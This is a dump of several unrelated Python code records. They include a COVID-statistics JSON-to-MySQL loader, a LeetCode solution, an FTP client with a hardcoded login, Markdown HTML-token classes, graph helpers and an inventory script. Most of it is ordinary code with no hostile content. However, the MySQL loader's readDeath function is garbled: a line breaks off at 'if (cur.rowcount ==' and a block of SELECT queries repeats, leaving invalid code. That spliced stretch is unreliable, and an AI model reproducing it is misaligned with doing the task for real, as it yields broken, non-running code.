testRegionID = %s\"\n\t\t\t\tval = (data['DATE'], '1', '1')\n\t\t\t\tcur.execute(sql,val)\n\t\t\t\tif (cur.rowcount == 0):\n\t\t\t\t\t# Check if date is older than 2 days from now\n\t\t\t\t\tif (date < dateToInsert):\n\t\t\t\t\t\ttry:\n\t\t\t\t\t\t\tsql = \"INSERT INTO tests(testDate,testProvinceID,testRegionID,testAll,testPos) VALUES (%s,%s,%s,%s,%s)\"\n\t\t\t\t\t\t\tval = 
(date,'1','1',testAll,testPos)\n\t\t\t\t\t\t\tcur.execute(sql,val)\n\t\t\t\t\t\t\tdb.commit()\n\t\t\t\t\t\texcept:\n\t\t\t\t\t\t\tprint(\"Error(102) - inserting test\")\n\n\t\texcept:\n\t\t\tprint('JSON FILE IS BROKEN - '+urlTest)\n\t\t\texit()\n# End function read json tests\n# ------------------------------\n# Start function read json hosps\ndef readHosp():\n\tdataset = url_getJSON(urlHosp)\n\tfor data in dataset:\n\t\ttry:\n\t\t\thospDate = data['DATE']\n\t\t\thospProvinceID = getProvinceID(data['PROVINCE'])\n\t\t\thospRegionID = getRegionID(data['REGION'])\n\t\t\ttotalInHosp = data['TOTAL_IN']\n\t\t\ttotalInICU = data['TOTAL_IN_ICU']\n\t\t\ttotalInResp = data['TOTAL_IN_RESP']\n\t\t\tnewInHosp = data['NEW_IN']\n\t\t\tnewOutHosp = data['NEW_OUT']\n\t\t\t\n\t\t\t# Check if object already exists\n\t\t\tsql= 'SELECT * FROM hosps WHERE hospDate = %s AND hospProvinceID = %s AND hospRegionID = %s'\n\t\t\tval = (hospDate, hospProvinceID, hospRegionID)\n\t\t\tcur.execute(sql,val)\n\t\t\t\n\t\t\t# If object is not in DB, insert\n\t\t\tif (cur.rowcount == 0):\n\t\t\t\t#Check if data is older than 2 days from now\n\t\t\t\tif (hospDate < dateToInsert):\n\t\t\t\t\ttry:\n\t\t\t\t\t\tsql = \"INSERT INTO hosps(hospDate,hospProvinceID,hospRegionID,totalInHosp,totalInICU,totalInResp,newInHosp,newOutHosp) VALUES (%s,%s,%s,%s,%s,%s,%s,%s)\"\n\t\t\t\t\t\tval = (hospDate,hospProvinceID,hospRegionID,totalInHosp,totalInICU,totalInResp,newInHosp,newOutHosp)\n\t\t\t\t\t\tcur.execute(sql,val)\n\t\t\t\t\t\tdb.commit()\n\t\t\t\t\texcept:\n\t\t\t\t\t\tprint(\"Error(102) - inserting hosps\")\n\t\t\t\t\t\t\n\t\texcept:\n\t\t\tprint('JSON FILE IS BROKEN - '+urlHosp)\n\t\t\texit()\n\t\t\t\n# End function read json hosps\n# -------------------------------\n# Start function read json deaths\ndef readDeath():\n\tdataset = url_getJSON(urlDeath)\n\tfor data in dataset:\n\t\ttry:\n\t\t\tspecialCase = 0\n\t\t\tdeathDate = data['DATE']\n\t\t\tdeathRegionID = getRegionID(data['REGION'])\n\t\t\tdeaths = data['DEATHS']\n\n\t\t\t# Check if key 'AGEGROUP' exists\n\t\t\tif ('AGEGROUP' in data):\n\t\t\t\tdeathAgeGroup = data['AGEGROUP']\n\t\t\telse:\n\t\t\t\tdeathAgeGroup = None\n\t\t\t\tspecialCase = 1\n\t\t\t\t\n\t\t\t# Check if key 'SEX' exists.\n\t\t\tif ('SEX' in data):\n\t\t\t\tdeathSex = data['SEX']\n\t\t\telse:\n\t\t\t\tdeathSex = None\n\t\t\t\tspecialCase = 1\n\t\t\t\n\t\t\t# The Select query is different if one or more values are None\n\t\t\tif (specialCase == 0):\n\t\t\t\tsql= 'SELECT * FROM deaths WHERE deathDate = %s AND deathRegionID = %s AND deathAgeGroup = %s AND deathSex = %s'\n\t\t\t\tval = (deathDate,deathRegionID,deathAgeGroup, deathSex)\n\t\t\t\tcur.execute(sql,val)\n\t\t\n\t\t\telse:\n\t\t\t\tif (deathAgeGroup == None and deathSex == None):\n\t\t\t\t\tsql = 'SELECT * FROM deaths WHERE deathDate = %s AND deathRegionID = %s AND deathAgeGroup IS NULL AND deathSex IS NULL'\n\t\t\t\t\tval = (deathDate,deathRegionID)\n\t\t\t\t\tcur.execute(sql,val)\n\t\t\t\telif (deathAgeGroup == None):\n\t\t\t\t\tsql = 'SELECT * FROM deaths WHERE deathDate = %s AND deathRegionID = %s AND deathAgeGroup IS NULL AND deathSex = %s'\n\t\t\t\t\tval = (deathDate,deathRegionID, deathSex)\n\t\t\t\t\tcur.execute(sql,val)\n\t\t\t\telse:\n\t\t\t\t\tsql = 'SELECT * FROM deaths WHERE deathDate = %s AND deathRegionID = %s AND deathAgeGroup = %s AND deathSex IS NULL'\n\t\t\t\t\tval = (deathDate,deathRegionID,deathAgeGroup)\n\t\t\t\t\tcur.execute(sql,val)\n\t\t\t\n\t\t\t# Check if the object already exists\n\t\t\tif (cur.rowcount == 
if (specialCase == 0):\n\t\t\t\tsql= 'SELECT * FROM deaths WHERE deathDate = %s AND deathRegionID = %s AND deathAgeGroup = %s AND deathSex = %s'\n\t\t\t\tval = (deathDate,deathRegionID,deathAgeGroup, deathSex)\n\t\t\t\tcur.execute(sql,val)\n\t\t\n\t\t\telse:\n\t\t\t\tif (deathAgeGroup == None and deathSex == None):\n\t\t\t\t\tsql = 'SELECT * FROM deaths WHERE deathDate = %s AND deathRegionID = %s AND deathAgeGroup IS NULL AND deathSex IS NULL'\n\t\t\t\t\tval = (deathDate,deathRegionID)\n\t\t\t\t\tcur.execute(sql,val)\n\t\t\t\telif (deathAgeGroup == None):\n\t\t\t\t\tsql = 'SELECT * FROM deaths WHERE deathDate = %s AND deathRegionID = %s AND deathAgeGroup IS NULL AND deathSex = %s'\n\t\t\t\t\tval = (deathDate,deathRegionID, deathSex)\n\t\t\t\t\tcur.execute(sql,val)\n\t\t\t\telse:\n\t\t\t\t\tsql = 'SELECT * FROM deaths WHERE deathDate = %s AND deathRegionID = %s AND deathAgeGroup = %s AND deathSex IS NULL'\n\t\t\t\t\tval = (deathDate,deathRegionID,deathAgeGroup)\n\t\t\t\t\tcur.execute(sql,val)\n\t\t\t\n\t\t\t# Check if the object already exists\n\t\t\tif (cur.rowcount == 0):\n\t\t\t\t\n\t\t\t\t#Check if data is older than 2 days from now\n\t\t\t\tif (deathDate < dateToInsert):\n\t\t\t\t\ttry:\n\t\t\t\t\t\tsql = 'INSERT INTO deaths(deathDate,deathRegionID,deathAgeGroup, deathSex, deaths) VALUES (%s,%s,%s,%s,%s)'\n\t\t\t\t\t\tval = (deathDate,deathRegionID,deathAgeGroup,deathSex,deaths)\n\t\t\t\t\t\tcur.execute(sql,val)\n\t\t\t\t\t\tdb.commit()\n\n\t\t\t\t\texcept:\n\t\t\t\t\t\tprint(\"Error(102) - inserting deaths\")\n\t\t\t\t\t\t\n\t\texcept:\n\t\t\tprint('JSON FILE IS BROKEN - '+urlDeath)\n\t\t\texit()\n# End function read json deaths\n# ------------------------------\n# Start function read json cases\ndef readCase():\n\tdataset = url_getJSON(urlCase)\n\tfor data in dataset:\n\t\ttry:\n\t\t\tcases = data['CASES']\n\t\t\t\n\t\t\t# Check if key 'DATE' exists\n\t\t\tif ('DATE' in data):\n\t\t\t\tcaseDate = data['DATE']\n\t\t\telse:\n\t\t\t\tcaseDate = None\n\n\t\t\t# Check if key 'AGEGROUP' exists\n\t\t\tif ('AGEGROUP' in data):\n\t\t\t\tcaseAgeGroup = data['AGEGROUP']\n\t\t\telse:\n\t\t\t\tcaseAgeGroup = None\n\t\t\t\n\t\t\t# Check if 'PROVINCE' exists\n\t\t\tif ('PROVINCE' in data):\n\t\t\t\tif (data['PROVINCE'] == 'Liège'):\n\t\t\t\t\tcaseProvinceID = getProvinceID('Liège')\n\t\t\t\telse:\n\t\t\t\t\tcaseProvinceID = getProvinceID(data['PROVINCE'])\n\t\t\telse:\n\t\t\t\tcaseProvinceID = 1\n\t\t\t\n\t\t\t# Check if 'REGION' exists\t\n\t\t\tif ('REGION' in data):\n\t\t\t\tcaseRegionID = getRegionID(data['REGION'])\n\t\t\telse:\n\t\t\t\tcaseRegionID = 1\n\t\t\t\t\n\t\t\t# Check if 'SEX' exists\n\t\t\tif ('SEX' in data):\n\t\t\t\tcaseSex = data['SEX']\t\n\t\t\telse:\n\t\t\t\tcaseSex = None\n\t\t\t\n\t\t\t# If one or more values are None, the SELECT query is different\n\t\t\tif (caseDate == None and caseAgeGroup == None and caseSex == None):\n\t\t\t\tsql = 'SELECT * FROM cases WHERE caseDate IS NULL AND caseProvinceID = %s AND caseRegionID = %s AND caseAgeGroup IS NULL AND caseSex IS NULL'\n\t\t\t\tval = (caseProvinceID, caseRegionID)\n\t\t\t\tcur.execute(sql,val)\n\t\t\t\t\n\t\t\telif (caseDate == None and caseAgeGroup == None):\n\t\t\t\tsql = 'SELECT * FROM cases WHERE caseDate IS NULL AND caseProvinceID = %s AND caseRegionID = %s AND caseAgeGroup IS NULL AND caseSex = %s'\n\t\t\t\tval = (caseProvinceID,caseRegionID,caseSex)\n\t\t\t\tcur.execute(sql,val)\n\t\t\t\t\n\t\t\telif (caseDate == None and caseSex == None):\n\t\t\t\tsql = 'SELECT * FROM cases WHERE caseDate IS NULL AND caseProvinceID = %s AND caseRegionID = %s AND caseAgeGroup = %s AND caseSex IS NULL'\n\t\t\t\tval = (caseProvinceID, caseRegionID,caseAgeGroup)\n\t\t\t\tcur.execute(sql,val)\n\t\t\t\t\n\t\t\telif (caseAgeGroup == None and caseSex == None):\n\t\t\t\tsql = 'SELECT * FROM cases WHERE caseDate = %s AND caseProvinceID = %s AND caseRegionID = %s AND caseAgeGroup IS NULL AND caseSex IS NULL'\n\t\t\t\tval = (caseDate,caseProvinceID, caseRegionID)\n\t\t\t\tcur.execute(sql,val)\n\t\t\t\t\n\t\t\telif (caseAgeGroup == None):\n\t\t\t\tsql = 'SELECT * FROM cases WHERE caseDate = %s AND caseProvinceID = %s AND caseRegionID = %s AND caseAgeGroup IS NULL AND caseSex = %s'\n\t\t\t\tval = (caseDate,caseProvinceID, caseRegionID,caseSex)\n\t\t\t\tcur.execute(sql,val)\n\t\t\t\n\t\t\telif (caseSex == None):\n\t\t\t\tsql = 'SELECT * FROM cases WHERE caseDate = %s AND caseProvinceID = %s AND caseRegionID = %s AND caseAgeGroup = %s AND caseSex IS NULL'\n\t\t\t\tval = (caseDate,caseProvinceID,caseRegionID,caseAgeGroup)\n\t\t\t\tcur.execute(sql,val)\n\t\t\t\t\n\t\t\telif (caseDate == None):\n\t\t\t\tsql = 'SELECT 
* FROM cases WHERE caseDate IS NULL AND caseProvinceID = %s AND caseRegionID = %s AND caseAgeGroup = %s AND caseSex = %s'\n\t\t\t\tval = (caseProvinceID, caseRegionID,caseAgeGroup, caseSex)\n\t\t\t\tcur.execute(sql,val)\n\t\t\t\t\n\t\t\telse:\n\t\t\t\tsql= 'SELECT * FROM cases WHERE caseDate = %s AND caseProvinceID = %s AND caseRegionID = %s AND caseAgeGroup = %s AND caseSex = %s'\n\t\t\t\tval = (caseDate,caseProvinceID,caseRegionID,caseAgeGroup,caseSex)\t\n\t\t\t\tcur.execute(sql,val)\n\t\t\t\n\t\t\t# Check if object already exists\n\t\t\tif (cur.rowcount == 0):\n\t\t\t\t# If the object is not in the DB, insert it\n\t\t\t\t# Check if date is older than 2 days from now\n\t\t\t\t# If this is not the case, the numbers are not correct\n\t\t\t\tif (caseDate == None):\n\t\t\t\t\tsql = \"INSERT INTO cases(caseDate,caseProvinceID,caseRegionID,caseAgeGroup,caseSex,cases) VALUES (%s,%s,%s,%s,%s,%s)\"\n\t\t\t\t\tval = (caseDate,caseProvinceID,caseRegionID,caseAgeGroup,caseSex,cases)\n\t\t\t\t\tcur.execute(sql,val)\n\t\t\t\t\tdb.commit()\n\t\t\t\t\t\n\t\t\t\telif (caseDate < dateToInsert):\n\t\t\t\t\ttry:\n\t\t\t\t\t\tsql = \"INSERT INTO cases(caseDate,caseProvinceID,caseRegionID,caseAgeGroup,caseSex,cases) VALUES (%s,%s,%s,%s,%s,%s)\"\n\t\t\t\t\t\tval = (caseDate,caseProvinceID,caseRegionID,caseAgeGroup,caseSex,cases)\n\t\t\t\t\t\tcur.execute(sql,val)\n\t\t\t\t\t\tdb.commit()\n\n\t\t\t\t\texcept:\n\t\t\t\t\t\tprint(\"Error(102) - inserting cases\")\n\n\t\texcept:\n\t\t\tprint('JSON FILE IS BROKEN - '+urlCase)\n\t\t\tprint(data)\n\t\t\texit()\n# End function read json cases\n# ----------------------------\n\ndef main():\n\treadHosp()\n\treadTest()\n\treadDeath()\n\treadCase()\n\nif __name__ == \"__main__\":\n\tmain()\n","sub_path":"JSON_2_MySQL/JSON2MySQL.py","file_name":"JSON2MySQL.py","file_ext":"py","file_size_in_byte":10958,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"518754436","text":"#\n# @lc app=leetcode.cn id=17 lang=python3\n#\n# [17] 电话号码的字母组合 (Letter Combinations of a Phone Number)\n#\n\n# @lc code=start\nfrom typing import List  # needed for the List[str] annotation outside the LeetCode runtime\n\n\nclass Solution:\n    def letterCombinations(self, digits: str) -> List[str]:\n        if not digits:\n            return []\n\n        dic = {\n            '2':'abc', \n            '3':'def', \n            '4':'ghi',\n            '5':'jkl', \n            '6':'mno',\n            '7':'pqrs',\n            '8':'tuv', \n            '9':'wxyz'\n        }\n        res = []\n\n        def recursion(s, tmp):\n            if s == \"\":\n                res.append(tmp)\n                return\n            for letter in dic[s[0]]:\n                recursion(s[1:], tmp + letter)\n\n        recursion(digits, '')\n\n        return res \n    \n# @lc code=end\n\n","sub_path":"17.电话号码的字母组合.py","file_name":"17.电话号码的字母组合.py","file_ext":"py","file_size_in_byte":735,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"251182480","text":"import ftplib\nfrom io import StringIO\nimport math\n\nglobal totalSize\n\ndef ftp_connect():\n    while True:\n        site_address = input('Please enter FTP address: ')\n        try:\n            with ftplib.FTP(site_address) as ftp:\n                ftp.login('SMartBird','12345')\n                print(ftp.getwelcome())\n                print('Current Directory', ftp.pwd())\n                ftp.dir()\n                print('Valid commands are cd/get/ls/exit - ex: get readme.txt')\n                ftp_command(ftp)\n                break # once ftp_command() exits, end this function (exit program)\n        except ftplib.all_errors as e:\n            print('Failed to connect, check your address and credentials.', e)\n\ndef convert_size(size_bytes):\n    if size_bytes == 0:\n        return \"0B\"\n    size_name = (\"B\", \"KB\", \"MB\", \"GB\", \"TB\", \"PB\", \"EB\", \"ZB\", \"YB\")\n    i = int(math.floor(math.log(size_bytes, 1024)))\n    p = math.pow(1024, i)\n    
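# Worked example: size_bytes=1536 gives i=1 and p=1024.0, so the\n    # function returns '1.5 KB'.\n    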
s = round(size_bytes / p, 2)\n    return \"%s %s\" % (s, size_name[i])\n    \n\n\ndef ftp_command(ftp):\n    while True: # Run until 'exit' command is received from user\n        command = input('Enter a command: ')\n        commands = command.split() # split command and file/directory into list\n\n        if commands[0] == 'cd': # Change directory\n            try:\n                ftp.cwd(commands[1])\n                print('Directory of', ftp.pwd())\n                ftp.dir()\n                print('Current Directory', ftp.pwd())\n            except ftplib.error_perm as e: # Handle 550 (not found / no permission error)\n                error_code = str(e).split(None, 1)\n                if error_code[0] == '550':\n                    print(error_code[1], 'Directory may not exist or you may not have permission to view it.')\n        elif commands[0] == 'get': # Download file\n            try:\n                \n                ftp.retrbinary('RETR ' + commands[1], open(commands[1], 'wb').write)\n                print('File successfully downloaded.')\n                \n            except ftplib.error_perm as e: # Handle 550 (not found / no permission error)\n                error_code = str(e).split(None, 1)\n                if error_code[0] == '550':\n                    print(error_code[1], 'File may not exist or you may not have permission to view it.')\n        elif commands[0] == 'ls': # Print directory listing\n            print('Directory of', ftp.pwd())\n            ftp.dir()\n        elif commands[0] == '..':\n            ftp.cwd(\"../\")\n            print('Directory of', ftp.pwd())\n            ftp.dir()\n        elif commands[0] == 'up':\n            try:\n                file=commands[1]\n                print(file)\n                myfile = open('/Users/Asus/Desktop/FTP/New folder/New folder (2)/'+ commands[1],'rb')\n                ftp.storbinary(\"STOR \" + commands[1],myfile)\n                print('File successfully uploaded.')\n            except ftplib.error_perm as e: # Handle 550 (not found / no permission error)\n                print('File may not exist or you may not have permission to view it.')\n        elif commands[0] == 'rename':\n            try: \n                newname = input('Enter New Name: ')\n                ftp.rename(commands[1],newname)\n                print('\\nSuccessfully Renamed File: '+ commands[1])\n                print('New Name is: '+ newname +'\\n')\n            except ftplib.error_perm as e: # Handle 550 (not found / no permission error)\n                error_code = str(e).split(None, 1)\n                print('###Something Wrong###')\n        elif commands[0] == 'delete':\n            try:\n                ftp.delete(commands[1])\n                print('\\nSuccessfully Deleted: '+ commands[1] +'\\n')\n            except ftplib.error_perm as e: # Handle 550 (not found / no permission error)\n                error_code = str(e).split(None, 1)\n                print('###Something Wrong###')\n        elif commands[0] == 'mkd':\n            try:\n                ftp.mkd(commands[1])\n                print('\\nSuccessfully Created: '+ commands[1] +'\\n')\n            except ftplib.error_perm as e: # Handle 550 (not found / no permission error)\n                error_code = str(e).split(None, 1)\n                print('###Something Wrong###')\n        elif commands[0] == 'rmd':\n            try:\n                ftp.rmd(commands[1])\n                print('\\nSuccessfully Removed: '+ commands[1] +'\\n')\n            except ftplib.error_perm as e: # Handle 550 (not found / no permission error)\n                error_code = str(e).split(None, 1)\n                print('###Something Wrong###')\n        elif commands[0] == 'size':\n            try:\n                ftp.sendcmd(\"TYPE i\")\n                
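# NOTE: SIZE is only reliable in binary mode, which the TYPE i command just\n                # requested; many servers reject SIZE while the transfer type is ASCII.\n                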
sz = ftp.size(commands[1])\n                \n                print('\\nFile size of '+ commands[1] +' is: ', convert_size(sz) ,'\\n')\n            except ftplib.error_perm as e: # Handle 550 (not found / no permission error)\n                error_code = str(e).split(None, 1)\n                print('###Something Wrong###')\n        elif commands[0] == 'move':\n            try: \n                newnamee = input('Enter new File path ex: dirB/hello.txt : ')\n                newname = newnamee+commands[1]\n                path = ftp.pwd()+commands[1]\n                ftp.rename(path,newname)\n                print('\\nSuccessfully Moved File: '+ commands[1])\n                print('New Path is: '+ newname +'\\n')\n            except ftplib.error_perm as e: # Handle 550 (not found / no permission error)\n                error_code = str(e).split(None, 1)\n                print('###Something Wrong###')\n        elif commands[0] == 'exit': # Exit application\n            ftp.quit()\n            print('Goodbye!')\n            break\n        else:\n            print('Invalid command, try again (valid options: cd/get/ls/exit).')\n\nprint('Welcome to Python FTP')\nftp_connect()\n","sub_path":"client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":5818,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"634147267","text":"\"\"\"\nMixin HTML tags support for mistletoe.\n\nInjection into the parsing process is achieved in the corresponding\nrenderer (mistletoe.html_renderer in this case.)\n\"\"\"\n\nimport re\nimport mistletoe.span_token as span_token\nimport mistletoe.block_token as block_token\n\n\n__all__ = ['HTMLBlock', 'HTMLSpan']\n\n\nclass HTMLBlock(block_token.BlockToken):\n    \"\"\"\n    Block-level HTML tokens.\n\n    Attributes:\n        content (str): literal strings rendered as-is.\n    \"\"\"\n    _last_tag = ''\n    pattern = re.compile(r'<(\\S+).*?>')\n    def __init__(self, lines):\n        self.content = ''.join(lines) # implicit newlines\n\n    @classmethod\n    def start(cls, line):\n        # single-line html token?\n        if HTMLSpan.pattern.match(line.strip()):\n            cls._last_tag = ''\n            return True\n        # multi-line html token?\n        match_obj = cls.pattern.match(line)\n        if match_obj:\n            cls._last_tag = match_obj.group(1)\n            return True\n        return False\n\n    @classmethod\n    def read(cls, lines):\n        line_buffer = [next(lines)]\n        if not cls._last_tag:\n            return line_buffer\n        for line in lines:\n            line_buffer.append(line)\n            start = line.find('</')\n            end = line.find('>')\n            if start != -1 and end != -1 and line[start+2:end] == cls._last_tag:\n                break\n        return line_buffer\n\n\nclass HTMLSpan(span_token.SpanToken):\n    \"\"\"\n    Span-level HTML tokens.\n\n    Attributes:\n        content (str): literal strings rendered as-is.\n    \"\"\"\n    pattern = re.compile(r\"<([A-z0-9]+?)(?: .+?)?(?: ?/>|>.*?<\\/\\1>)|<!--.+?-->\")\n    def __init__(self, match_obj):\n        self.content = match_obj.group(0)\n","sub_path":"mistletoe/html_token.py","file_name":"html_token.py","file_ext":"py","file_size_in_byte":1708,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"620389129","text":"answers_test=[\"a\", \"a\", \"c\", \"b\"]\nanswers_right=[\"a\", \"a\", \"b\", \"\"]\nscore=0\n\nfor i in range(len(answers_test)):\n    print(answers_test[i])\n\nfor test, right in zip(answers_test, answers_right):\n    print(test, '-->', right)\n    if test == right:\n        score = score + 4\n        print('score increased: ', score)\n    if right == \"\":\n        print('none')\n    if test != right:\n        if right != \"\":\n            score = score - 1\n            print('score decreased: ', score)\n        else:\n            print('score not changed: ', score)\n","sub_path":"1-1.py","file_name":"1-1.py","file_ext":"py","file_size_in_byte":539,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"218103037","text":"import networkx as nx\nfrom typing import List\nfrom ..data_structures.case import Case\nfrom ..utils import time_difference, extract_cases_time_and_trace\n\n\ndef normalize_graph(graph: nx.DiGraph) -> nx.DiGraph:\n    \"\"\"\n    Time and weight normalization for each edge in the graph.\n    Time normalization is the mean time of an edge.\n    Trace normalization is based on the graph weights\n\n    Parameters\n    --------------------------------------\n    graph: nx.DiGraph,\n        Graph to be normalized\n    Returns\n    --------------------------------------\n    graph: nx.DiGraph,\n        Normalized graph\n    \"\"\"\n    max_weight = max([attributes['weight'] for n1, n2, attributes in graph.edges(data=True)])\n    
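# NOTE: weights are normalized against the global maximum, while dividing\n    # 'time' by 'weight' turns the accumulated total into a per-traversal mean.\n    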
for node1, node2, data in graph.edges(data=True):\n        data['weight_normalized'] = data['weight'] / max_weight\n        data['time_normalized'] = data['time'] / data['weight']\n\n    return graph\n\n\ndef initialize_graph(graph: nx.DiGraph, case_list: List[Case]) -> nx.DiGraph:\n    \"\"\"\n    Initialize a graph based on the weights and time differences from a list of cases\n\n    Parameters\n    --------------------------------------\n    graph: nx.DiGraph,\n        Graph to be initialized\n    case_list: List[Case],\n        List of cases used to initialize the graph\n    Returns\n    --------------------------------------\n    graph: nx.DiGraph,\n        Initialized graph\n    \"\"\"\n    trace_list, time_list = extract_cases_time_and_trace(case_list)\n\n    time_list = time_difference(time_list)\n\n    for trace, time in zip(trace_list, time_list):\n        for i in range(len(trace)-1):\n            edges = (trace[i], trace[i+1])\n            if edges not in graph.edges:\n                graph.add_edge(*edges, weight=1, time=time[i])\n            else:\n                graph[edges[0]][edges[1]]['weight'] += 1\n                graph[edges[0]][edges[1]]['time'] += time[i]\n\n    return normalize_graph(graph)\n\n\ndef merge_graphs(process_model_graph: nx.DiGraph, check_point_graph: nx.DiGraph) -> nx.DiGraph:\n    \"\"\"\n    Receives two graphs and merges them.\n    The first is the PMG (process model graph) and the second is the CP (check point) graph.\n    The PMG, then, incorporates the second graph.\n    Before the merge, 5% of the PMG's weight is decayed.\n\n    Parameters\n    --------------------------------------\n    process_model_graph: nx.DiGraph,\n        PMG graph\n    check_point_graph: nx.DiGraph,\n        CP graph\n    Returns\n    --------------------------------------\n    process_model_graph: nx.DiGraph,\n        PMG after merge\n    \"\"\"\n    for node1, node2, data in process_model_graph.edges(data=True):\n        data['weight'] *= 0.95\n\n    for node1, node2, data in check_point_graph.edges(data=True):\n        path = (node1, node2)\n        if path in process_model_graph.edges:\n            process_model_graph[node1][node2]['weight'] += data['weight']\n            process_model_graph[node1][node2]['time'] += data['time']\n        else:\n            process_model_graph.add_edge(*path, weight=data['weight'], time=data['time'])\n\n    return normalize_graph(process_model_graph)\n","sub_path":"cdesf2/utils/graph_operation.py","file_name":"graph_operation.py","file_ext":"py","file_size_in_byte":3075,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"155421705","text":"#!/usr/bin/env python3\n#! -*- coding: utf-8 -*-\nfrom tkinter import *\nimport os\ndef click1():\n\tos.system(\"python MyBase64GUI.py\")\ndef click2():\n\tos.system(\"start python Mydic.py\")\ndef click3():\n\tos.system(\"python Myqrcode.py\")\nroot=Tk()\nroot.title('Mytools')\nA=Button(root,text=\"Base64 Tools\",command=click1,height=5,width=30,activeforeground='blue')\nB=Button(root,text=\"Dictionary Tools(without GUI)\",command=click2,height=5,width=30,activeforeground='blue')\nC=Button(root,text=\"QR Tools\",command=click3,height=5,width=30,activeforeground='blue')\nA.pack()\nB.pack()\nC.pack()\nroot.mainloop()","sub_path":"FirstWeek/Mytools.py","file_name":"Mytools.py","file_ext":"py","file_size_in_byte":590,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"565804639","text":"#Create a function called tup2Dict. tup2Dict should take one\n#parameter: a list of tuples. 
You can assume each tuple in\n#the list has exactly two values.\n#\n#The function should return a dictionary where the first item\n#in each tuple is the key, and the second item in each tuple\n#is the corresponding value.\n#\n#For example:\n# colors = [(\"turquoise\", \"#40E0D0\"), (\"red\", \"#990000\")]\n# tup2Dict(colors) -> {\"turquoise\":\"#40E0D0\", \"red\":\"#990000\"}\n#\n#Hint: the previous exercise is very similar; this just turns\n#it into a function!\n\n\n#Write your function here!\ndef tup2Dict(tuplelist):\n    rgb = {}\n    for atuple in tuplelist:\n        rgb[atuple[0]] = atuple[1]\n    return rgb\n\n#The code below will test your function. It is not used for\n#grading, so feel free to modify it. As written, this should\n#print: {'turquoise':'#40E0D0', 'red':'#990000'}\n#Don't worry if it prints those in the reverse order; that's\n#still correct!\nprint(tup2Dict([(\"turquoise\", \"#40E0D0\"), (\"red\", \"#990000\")]))\n\n\n","sub_path":"Unit 4 Data Structures/Chapter 4.5 Dictionaries/4.5.2 Coding Exercise 2.py","file_name":"4.5.2 Coding Exercise 2.py","file_ext":"py","file_size_in_byte":990,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"558357236","text":"import json\n\ndef adding_item_data(oneDict, item_value, item_number):\n    \"\"\"\n\n    :param oneDict: Dictionary holding one item values\n    :param item_value: integer describing a price per item\n    :param item_number: integer describing amount\n    :return:\n    \"\"\"\n    # (total value of current stock + total value of added stock) / total number of items\n    oneDict[\"VALUE\"] = (float(oneDict[\"VALUE\"] * oneDict[\"NUMBER\"]) + (float(item_value) * float(item_number))) / (\n            oneDict[\"NUMBER\"] + int(item_number))\n    oneDict[\"NUMBER\"] += int(item_number)\n\n    return(oneDict[\"VALUE\"], oneDict[\"NUMBER\"])\n\n
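# Worked example: with oneDict = {\"VALUE\": 2.0, \"NUMBER\": 10}, adding 5 items\n# priced 4.0 each gives VALUE = (2.0*10 + 4.0*5) / 15 = 2.67 (rounded) and NUMBER = 15.\n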
\ndef adding_new_item_to_inventory(inventory, item_name, item_value, item_number):\n    \"\"\"\n    Goal: Add a new item to the inventory list\n    :param inventory:\n    :param item_name:\n    :param item_value:\n    :param item_number:\n    :return:\n    \"\"\"\n    newItem = {}\n    newItem[\"NAME\"] = item_name\n    newItem[\"NUMBER\"] = int(item_number)\n    newItem[\"VALUE\"] = float(item_value)\n    inventory.append(newItem)\n    return inventory\n\ndef get_item_data_from_user():\n    \"\"\"\n    Goal: Ask user for item data and extract it from user input\n    :return:\n    \"\"\"\n    user_input = input(\"item name, item value, item number\")\n    user_input = user_input.split(\",\")\n    return user_input[0], user_input[1], user_input[2]\n\ndef add(param1):\n    \"\"\"\n    Goal: Adding item data to inventory\n    :param param1:\n    :return:\n    \"\"\"\n    inventory = param1\n    #format: A,item name, amount, price\n    isFound = False\n    item_name, item_value, item_number = get_item_data_from_user()\n    for one_item in inventory:\n        #print(oneDict)\n        #If the item is found, make a calculation to get the value of one item and add the new stock to the inventory stock.\n        if item_name == one_item[\"NAME\"]:\n            one_item[\"VALUE\"], one_item[\"NUMBER\"] = adding_item_data(one_item, item_value, item_number)\n            isFound = True\n\n    #If item not found in inventory add it to inventory\n    if isFound == False:\n        inventory = adding_new_item_to_inventory(inventory, item_name, item_value, item_number)\n\n    return inventory\n\ndef selling_item_still_on_lager(oneDict, wantsToSell):\n    \"\"\"\n    Goal: Remove item data from inventory\n    :param oneDict:\n    :param wantsToSell:\n    :return:\n    \"\"\"\n    oneDict[\"NUMBER\"] = oneDict[\"NUMBER\"] - wantsToSell\n    # If amount after subtraction is 0 the value is also 0\n    if oneDict[\"NUMBER\"] == 0:\n        oneDict[\"VALUE\"] = 0\n\n    return(oneDict[\"NUMBER\"], oneDict[\"VALUE\"])\n\ndef sell(param1):\n    inventory = param1\n    isFound = False\n    item_name, item_value, item_number = get_item_data_from_user()\n    for oneDict in inventory:\n        #Find the item to subtract\n        if item_name == oneDict[\"NAME\"]:\n            isFound = True\n            currentLager = oneDict[\"NUMBER\"]\n            wantsToSell = int(item_number)\n\n            #If amount after subtraction is >= 0\n            if currentLager - wantsToSell >= 0:\n                oneDict[\"NUMBER\"], oneDict[\"VALUE\"] = selling_item_still_on_lager(oneDict, wantsToSell)\n\n            #If amount after subtraction would be below 0, make it 0 and tell the user the number that can not be subtracted\n            elif (currentLager - wantsToSell) < 0:\n                oneDict[\"NUMBER\"] = 0\n                oneDict[\"VALUE\"] = 0\n                print(\"Subtracted as much as possible\\nThere was {0} in stock and you subtracted {1}.\\n\"\n                      \"I removed {2} and there is {3} left to be removed\".format(currentLager,\n                        wantsToSell, currentLager, (wantsToSell - currentLager)))\n\n    #If the selling item has never been in the warehouse inform the user\n    if isFound == False:\n        print(\"Can't find {0}. {0} has never been in the warehouse!\".format(item_name))\n\n    return (inventory)\n\n\n\n# Calculating the total stock and total value of all 